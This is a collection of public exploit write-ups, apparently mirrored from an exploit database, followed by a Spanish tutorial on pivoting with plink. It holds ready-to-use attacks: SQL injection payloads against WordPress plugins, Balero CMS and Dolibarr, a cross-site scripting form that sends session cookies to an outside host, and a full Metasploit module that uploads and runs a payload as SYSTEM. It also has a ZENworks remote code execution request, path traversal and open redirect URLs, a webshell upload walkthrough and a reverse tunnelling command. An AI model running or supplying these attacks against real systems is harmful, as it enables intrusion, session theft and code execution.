HireHackking

###################### # Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ # Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U # Date : 2015-04-05 # Tested on : Linux / Mozilla Firefox ###################### # Description WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability There are some pages with wordpress esc_sql function. esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/) isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = ''; isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = ''; - admin/wp-security-list-404.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'id'; $order = !empty($order) ? esc_sql($order) : 'DESC'; ... ... $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A); - admin/wp-security-list-login-fails.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A); - admin/wp-security-list-acct-activity-php $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A) - admin/wp-security-list-locked-ip.php $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date'; $order = !empty($order) ? esc_sql($order) : 'DESC'; $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A) ###################### # PoC http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc ###################### # Vulnerability Disclosure Timeline: 2015-04-05: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (3.9.1) 2015-04-07: Public Disclosure ####################### Discovered By : Claudio Viviani http://www.homelab.it http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection # Google Dork: inurl:/plugins/trafficanalyzer/js/ # Date: 4/7/2015 # Exploit Author: Dan King (@fuzztester) # Vendor Homepage: http://wptrafficanalyzer.in/ # Software Link: https://wordpress.org/plugins/trafficanalyzer/ # Version: 3.4.2 # Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11 [+] Issue [+] The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value. [+] Impact [+] This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation. [+] Details [+] The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data. From 'class-TrafficAnalyzer.php' line number 297: ###################################################################################### $sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ". " ('".$hid."'," . " '".$_SERVER["REMOTE_ADDR"]."', ". "'".$_SERVER['SCRIPT_NAME']."', " . " '".$_SERVER["HTTP_USER_AGENT"]."', ". " '". $_SERVER['REQUEST_URI']. "', ". " '".$resource_type."', " . " '".$browser."', " . " '".$resource ."', " . " '".$referer . "', " . " '".$this->wpta_cookie . "'" . " )"; ########################################################################################### [+] Proof of Concept [+] Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds. GET /[wordpress path]/ HTTP/1.1 Host: x.x.x.x Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'

<!-- Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: http://www.balerocms.com Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal. Desc: Input passed to the 'content' POST parameter and the cookie 'counter' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5239 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php 04.03.2015 --> <html> <body> <script> document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/"; </script> </body> </html> csrf+stored xss+filter bypass+session hijack: <html> <body> <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST"> <input type="hidden" name="title" value="ZSL" /> <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" /> <input type="hidden" name="files" value="joxy.poxy" /> <input type="hidden" name="delete_post[]" value="135" /> <input type="hidden" name="id" value="135" /> <input type="hidden" name="submit" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html>

 Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: http://www.balerocms.com Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal. Desc: The application suffers from multiple blind SQL injection vulnerabilities when input is passed to several POST parameters thru their affected modules which are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Vulnerable POST parameters in affected modules: ----------------------------------------------- - pages [admin] - themes [admin] - code [mod-languages] - id [mod-blog, mod-virtual_page] - title [mod-blog] - a [mod-virtual_page] - virtual_title [mod-virtual_page] ----------------------------------------------- Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5238 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php 04.03.2015 -- csrf+bsqli poc: <html> <body> <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST"> <input type="hidden" name="virtual_title" value="ZSL" /> <input type="hidden" name="a" value="1" /> <input type="hidden" name="content" value="Testingus" /> <input type="hidden" name="_wysihtml5_mode" value="1" /> <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " /> <input type="hidden" name="submit_delete" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html>

Plink.exe es la versión para línea de comandos de PuTTY SSH Client. En los Windows más recientes, ya hay un cliente SSH incorporado por lo que no es muy útil plink, sin embargo, sí que lo es para los sistemas más antiguos los cuales no tienen este cliente SSH. Podemos encontrar el binario de plink normalmente en la ruta: /usr/share/windows-resources/binaries/plink.exe Si no, se puede descargar desde la web oficial de putty. Siendo plink.exe un cliente SSH, lo único que podemos hacer es un Remote Port Forwarding. En el post de SSH ya se comentó el peligro que tiene esto, básicamente de esta forma estás escribiendo las credenciales de tu equipo en una máquina que no es tuya, por lo que hay que tener cuidado (también se puede hacer uso de claves asimétricas). El comando para usar plink.exe es el siguiente: cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar> Transferiríamos plink a la máquina Windows y ejecutaríamos el comando desde ahí. La primera parte del comando: cmd.exe /c echo y, sirve para en las shells no interactivas (como es la mayoría de reverse shells en sistemas Windows), poder aceptar el mensaje de precaución que lanza plink por defecto. Por lo demás, el resto del comando se entiende fácil si ya se ha tocado Remote Port Forwarding, si no, recomiendo visitar el post de Pivoting con SSH. Además de esto, algunos parámetros útiles que podemos agregar en plink son los siguientes: -g –> permite que otros clientes de la LAN puedan conectarse al puerto que se abre en la máquina atacante. Por defecto solo se puede en local.-f –> plink se va al segundo plano una vez se ha establecido la sesión SSH de forma exitosa.-N –> indicamos que no ejecute una shell, simplemente que se conecte (esto no significa que el proceso se mande al segundo plano), es decir, quedaría así: Es bastante recomendable usar los parámetros -f y -N. -i –> permite indicar una clave privada. Sin embargo, hay que hacer una conversión, ya que plink no va a entender el formato por defecto que nos deja ssh-keygen. Una vez tenemos generada la clave privada con ssh-keygen, seguimos los siguientes pasos: Instalamos las tools de putty: sudo apt install putty-tools Una vez instaladas, hacemos uso de puttygen: puttygen <clave privada> -o <nueva clave privada>.ppk De esta forma, esta nueva clave privada que tenemos si la entenderá plink y podremos usarla. Con todo esto explicado, vamos a hacer una prueba en el siguiente laboratorio: 3 EquiposKaliIP: 192.168.10.10Windows 7IP: 192.168.10.40 y 192.168.20.40 –> 2 Interfaces de RedDebian –> Servidor Web y SSH – Puerto 22 y 80 activadosIP: 192.168.20.20 OJO: de cara al Remote Port Forwarding, recomiendo hacer un cambio simple de contraseña en el passwd. Para quien no conozca esto, básicamente puedes generar una contraseña en DES UNIX con openssl: Si cogemos esta contraseña generada y la sustituimos en el passwd por la «x«, la contraseña del usuario será la que hemos puesto en openssl, en este caso «hola«, cuando se quiera volver a la contraseña anterior simplemente en el passwd se quita lo escrito y se vuelve a poner la «x«. Con esto hecho, nos dirigimos al Windows y usamos plink como se indicaba en el comando escrito previamente: cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar> Si nos fijamos hay dos puntos importantes aquí: Podemos tunelizar tantos puertos como queramos, siempre usando el parámetro -R.Al tunelizar un puerto SSH, tenemos que indicarle otro puerto a utilizar/abrir en nuestra máquina que no sea el 22, ya que este ya se está empleando. De esta forma, ya tenemos ambos puertos tunelizados, en este caso el 22 (el 2222 en nuestra máquina) y el 80: Plink es una herramienta que poco a poco se irá quedando en desuso por la implementación por defecto del cliente SSH en los sistemas Windows. Sin embargo, en ciertas ocasiones donde estemos lidiando con algún que otro sistema antiguo, nos puede venir bastante bien.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", 'Description' => %q{ This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set the 'username' attribute before authentication. The second problem is that the settings-new.jsp file will only check the 'username' attribute before authorizing the 'uploadFile' action, which can be exploited and allows the attacker to upload a fake xls host list file to the server, and results in arbitrary code execution under the context of SYSTEM. Depending on the installation, by default the Change Advisor web server is listening on port 48080 for an express install. Otherwise, this service may appear on port 8080. Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may download it from the module's References section. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod', # Original discovery 'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ 'sinn3r' # Metasploit ], 'References' => [ ['CVE', '2015-2284'], ['OSVDB', '81634'], ['ZDI', '15-107'], ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip'] ], 'DefaultOptions' => { 'RPORT' => 48080 # Could be 8080 too }, 'Platform' => 'win', 'Targets' => [ ['Solarwinds Firewall Security Manager 6.6.5', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 13 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/']) ], self.class) end # Returns a checkcode that indicates whether the target is FSM or not def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp')) if res && res.body =~ /SolarWinds FSM Change Advisor/i return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end # Exploit/run command def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager') end # Stage 1 of the attack # 'admin' is there by default and you can't delete it username = 'admin' print_status("Auth bypass: Putting session value: username=#{username}") sid = put_session_value(username) print_status("Your SID is: #{sid}") # Stage 2 of the attack exe = generate_payload_exe(code: payload.encoded) filename = "#{Rex::Text.rand_text_alpha(5)}.jsp" # Because when we get a shell, we will be at: # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice # So we have to adjust this filename in order to delete the file register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}") malicious_file = get_jsp_payload(exe, filename) print_status("Uploading file: #{filename} (#{exe.length} bytes)") upload_exec(sid, filename, malicious_file) end private # Returns a write-stager # I grabbed this from Juan's sonicwall_gms_uploaded.rb module def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| jspraw << %Q|int numbytes = data.length();\n| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| jspraw << %Q|{\n| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| jspraw << %Q| comb <<= 4;\n| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| jspraw << %Q|}\n| jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| jspraw << %Q|%>\n| jspraw end # Returns JSP that executes stuff # This is also from Juan's sonicwall_gms_uploaded.rb module def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|try {\n| jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end # Returns a JSP payload def get_jsp_payload(exe, output_file) jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file) end # Creates an arbitrary username by abusing the server's unsafe use of session.putValue def put_session_value(value) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'), 'method' => 'GET', 'vars_get' => { 'username' => value } ) unless res fail_with(Failure::Unknown, 'The connection timed out while setting the session value.') end get_sid(res) end # Returns the session ID def get_sid(res) cookies = res.get_cookies sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || '' sid end # Uploads a malicious file and then execute it def upload_exec(sid, filename, malicious_file) res = upload_file(sid, filename, malicious_file) if !res fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.') elsif res.body.include?('java.lang.NoClassDefFoundError') print_status('Payload being treated as XLS, indicates a successful upload.') else print_status('Unsure of a successful upload.') end print_status('Attempting to execute the payload.') exec_file(sid, filename) end # Uploads a malicious file # By default, the file will be saved at the following location: # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\ def upload_file(sid, filename, malicious_file) # Put our payload in: # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\ filename = "../../jsp/#{filename}" mime_data = Rex::MIME::Message.new mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"") mime_data.add_part('uploadFile', nil, nil, 'name="action"') proto = ssl ? 'https' : 'http' ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}" send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'), 'method' => 'POST', 'vars_get' => { 'action' => 'uploadFile' }, 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'cookie' => sid, 'headers' => { 'Referer' => ref } ) end # Executes the malicious file and get code execution # We will be at this location: # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice def exec_file(sid, filename) send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', filename) ) end # Overrides the original print_status so we make sure we print the rhost and port def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end

>> Remote code execution in Novell ZENworks Configuration Management 11.3.1 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 07/04/2015 / Last updated: 07/04/2015 >> Background on the affected product: "Automate and accelerate your Windows 7 migration Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts. Boost user productivity Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use. Eliminate IT effort Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices. Expand your freedom to choose Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more. Simplify deployment with virtual appliances Slash deployment times with a convenient virtual appliance deployment option. Enjoy a truly unified solution Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks console—called ZENworks Control Center." This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite. A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell: - Did not bother issuing a security advisory to their customers. - Did not credit me even though I did responsible disclosure. - Refused to provide a CVE number for months. - Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module). - Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776). >> Technical details: Vulnerability: Remote code execution via file upload and directory traversal CVE-2015-0779 Constraints: none; no authentication or any other information needed Affected versions: ZENworks Configuration Management 11.3.1 and below POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war <WAR file payload in the body> The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be "../webapps/"). A Metasploit module that exploits this vulnerability has been released. >> Fix: Upgrade to version ZENworks Configuration Management 11.3.2. [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5096

source: https://www.securityfocus.com/bid/51922/info Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability. Successfully exploiting this issue will allow remote attackers to gain access to a live stream from the camera. http://www.example.com/anony/mjpg.cgi

source: https://www.securityfocus.com/bid/51939/info Apache MyFaces is prone to a remote information-disclosure vulnerability. Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following versions are affected: Apache MyFaces 2.0.1 through 2.0.11 Apache MyFaces 2.1.0 through 2.1.5 http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF

source: https://www.securityfocus.com/bid/51952/info PHP is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users. PHP 5.3.8 is vulnerable; other versions may also be affected. <?php // make a Pdo_Mysql statement before $result = $stmt->fetch(PDO::FETCH_LAZY); session_start(); $_SESSION['PDORow'] = $result; ?>

source: https://www.securityfocus.com/bid/51964/info LxCenter Kloxo is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Kloxo 6.1.0 is vulnerable; other versions may be affected. Proof of Concept: ================= The vulnerabilities can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ... 1.1 Localhost {Command Center} <script> global_need_list = new Array(); </script><script> global_match_list = new Array(); </script><script> global_desc_list = new Array(); </script><form onsubmit=``return check_for_needed_variables(`command_centerlocalhost`);`` method=``post`` enctype=``multipart/form-data`` action=``/display.php`` id=``command_centerlocalhost`` name=``command_centerlocalhost``> <fieldset style=``background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;`` width=``90%``><legend style=`` font-weight: normal; border: 0px none;``><font color=``#303030`` style=``font-weight: bold;``>Command Center for localhost </font> </legend></fieldset> <div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=`` left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/> <input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/> <div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Command <br/> ... or <input width=``60%`` type=``text`` value=`` name=``frm_pserver_c_ccenter_command`` class=``frm_pserver_c_ccenter_command textbox``/> <iframe size=``30`` <``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``> </div> <div align=left style=`padding:10 10 10 10 ;border-top :1px solid #aaaaaa; background-color:#ffffff;display:block` > Output <br> <textarea nowrap id=textarea_ class= frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;` name=`` size=30 >&lt;/textarea&gt; <script type=``text/javascript``>createTextAreaWithLines(`textarea_`);</script> <style> 1.2 Server => Information => 2 x Verbose Input <font color=``#303030`` style=``font-weight: bold;``>Information for localhost </font> </legend></fieldset> <div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``><div align=``left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``><input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/> <input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/> <script> global_need_list[`frm_pserver_c_description`] = `Verbose Description (to Identify)`; </script> <div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;``> Verbose Description (to Identify) <font color=``red``>^*</font> <br/> <input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=`` >`` name=``frm_pserver_c_description`` class=``frm_pserver_c_description textbox``/>`` size=``30``> </div> <div align=``left`` style=`` padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); display: block;``> FQDN Hostname <br/> <input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` <iframe=`` value=``>`` name=``frm_pserver_c_realhostname`` class=`` frm_pserver_c_realhostname textbox``/>`` size=``30``> </div> <div align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;``> Load Threshold At Which Warning Is Sent <br/> <input width=``60%`` type=``text`` size=``30`` value=``20`` name=``frm_pserver_c_load_threshold`` class=``frm_pserver_c_load_threshold textbox``/> </div> <input type= ``hidden`` value=``update`` name=``frm_action``/> <input type=``hidden`` value=``information`` name=``frm_subaction``/> Reference(s): ../command-center.txt ../server-verbose-input.txt

source: https://www.securityfocus.com/bid/51956/info Dolibarr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected. http://www.example.com/adherents/fiche.php?rowid=-1%27

source: https://www.securityfocus.com/bid/51966/info CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. CubeCart 3.0.20 is vulnerable; other versions may also be affected. http://www.example.com/cube3.0.20/admin/login.php?goto=//yehg.net

source: https://www.securityfocus.com/bid/51966/info CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. CubeCart 3.0.20 is vulnerable; other versions may also be affected. http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D

source: https://www.securityfocus.com/bid/51966/info CubeCart is prone to a URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. CubeCart 3.0.20 is vulnerable; other versions may also be affected. http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es

source: https://www.securityfocus.com/bid/51968/info Zen Cart is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. Zen Cart 1.3.9h is vulnerable; other versions may be affected. <form name="products" action=" http://www.example.com/path_to_admin/product.php?action=delete_product_confirm"; method="post"> <label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything�" /><br/><br/> <label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/> <label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/> <input type="submit" border="0" alt="Delete" value=" Delete Product"> </form>

############################################################### ID: S21SEC-005-en Title: Vulnerability in BOA web server v0.94.8.2 Date: 03/10/2000 Status: Vendor contacted, patch available Scope: Arbitrary file access Platforms: Unix Author: llmora Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt Release: Public ############################################################### S 2 1 S E C http://www.s21sec.com Vulnerability in BOA web server v0.94.8.2 There is a security bug in BOA v0.94.8.2 that allows a malicious user to access files outside the document root of the web server as the user the server runs as. About BOA --------- Boa is an open source high performance web server for Unix-alike computers (http://www.boa.org). It does file serving and dynamic content generation via CGI. Vulnerability description ------------------------- - Reading any file in the web server The boa web server suffers of the well-known "../.." web server problem. If we request a document from the web server, using the "../.." technique, we get: homer:~$ telnet ilf 80 Escape character is '^]'. GET /../../../../../../../../../../../etc/motd HTTP/1.0 HTTP/1.0 404 Not Found <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY><H1>404 Not Found</H1> The requested URL /etc/motd was not found on this server. </BODY></HTML> Connection closed by foreign host. homer:~$ So apparently it doesn't work, as boa checks for "/.." in the path. By URL-encoding the "." in the request, we are able to skip the ".." test, allowing us to access the contents of any file the user running the web server has access to: homer:~$ telnet ilf 80 GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2 E/etc/motd HTTP/1.0 HTTP/1.0 200 OK [... the /etc/motd file content is shown] Connection closed by foreign host. homer:~$ If the administrator enables extension based CGI support with a line like this in the boa.conf file: AddType application/x-httpd-cgi cgi then a request for a file ending in .cgi will result in the file being executed with the privileges of the user id running the web server. This file can be placed in any folder throughout the file system, not strictly under the DocumentRoot, and be accessed using the previous bug, leading to the web server account compromise. Affected versions ----------------- This bug has been tested and verified to be present in v0.94.8.2 of the boa web server. Version 0.92 of boa is not affected by this problem. Fix information --------------- The boa development team has released v0.94.8.3 which fixes this vulnerability. Upgrades are available at the vendor website (http://www.boa.org). S21SEC wishes to thank the boa development team for acknowledging the issue and releasing a security patch in a matter of hours. Additional information ---------------------- This vulnerability was found and researched by: Lluis Mora llmora@s21sec.com You can find the latest version of this advisory at: http://www.s21sec.com/en/avisos/s21sec-005-en.txt And other S21SEC advisories at http://www.s21sec.com/en/avisos/

################################################################################################## #Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility #Author : Manish Kishan Tanwar AKA error1046 #Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ #Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip #Date : 9/04/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server and hence vulnerable to arbitrary file upload //////////////// /// POC //// /////////////// Uploading PHP shell ================================= Just open uploader.php in plugin directory http://target.com/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php browse your php shell and submit it. after uploading, you will get your shell in uploads directory at following location http://target.com/wp-content/uploads/i-dump-uploads/ demo:- http://127.0.0.1/wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php and upload your shell --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika 